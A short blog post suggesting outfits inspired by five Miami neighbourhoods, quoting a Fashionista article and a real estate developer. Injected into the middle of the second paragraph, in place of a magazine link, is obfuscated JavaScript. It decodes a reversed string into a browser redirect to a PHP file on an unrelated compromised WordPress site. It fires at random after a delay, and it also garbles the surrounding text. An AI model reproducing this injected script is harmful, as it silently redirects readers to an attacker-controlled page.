5 Miami Aesthetic Inspired Fashion trends

A few days ago an article was published by Fashionista, a trusted source of fashion news, criticism and career advice titled “Miami Is Emerging as America’s Next Fashion City.” The article named fashion designer Naeem Khan’s headquarters move to Miami, the Design District, and the opening of the Miami Fashion Institute as just the beginning of what will be a rapid growth of fashion and design in Miami.
On top of that, Miami real estate developer Avra Jain credits Miami fashion and art for inspiring and elevating the design of Miami architecture. “Miami became a much more conscious city, and put us back on a global stage with designers like Zaha Hadid.” It speaks to the market and the developers have stepped up and created really interesting, beautiful things.” Said Jain in an interview with $cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andrive.com/miami-experts-on-real-estate-industry-and-hottest-neighborhoods">Ocean Drive Magazine.
As an ode to our city and its emerging industries, here are five Miami aesthetic inspired fashion trends:

1. MiMo District
The Miami Modern aka MiMo is where modern meets retro. The preserved Art Deco buildings from the 1950’s mixed with the modern dining and shopping scene make for a fashion lover’s dream. Think vintage florals, and modern sleek whites on your next trip to Miami Modern.

2. The Design District
Luxury. Miami’s Design District boasts luxury, from its futuristic architecture to its glamourous shops- this part of Miami is nothing short of extravagant. When looking to fashion inspiration think sleek white and creamy chic fabrics.

3. Wynwood
This free flowing neighborhood is home to talented artists and a busy nightlife. The buildings are decorated in colorful graffiti, and the sidewalks adorned with inspiring quotes. As far as fashion goes, rules are out the window in Wynwood. Try pairing a vintage band tee with slacks like Gigi Hadid for an “I do what I want” vibe that is well known in Wynwood.

4. Downtown Miami
The historic heart of Miami. Downtown is where the hustle and bustle takes place, every day and every night. There is a beautiful mix of history and modernism here, from the Miami Tower that lights up in different colors, to the Freedom Tower, a U.S. historic landmark. For a Downtown Miami inspired outfit, think vibrant colors and eccentric patterns to capture the essence of the city.

5. Coral Gables
Inspired by antiquity and Spanish architecture, Coral Gables is a breathtaking sight. The vibrant color scheme mixed with the lush landscape was made to inspire artists and poets, and The Gables do not disappoint. Think pastel linen fabrics, and flowing dresses for a Coral Gables inspired look.
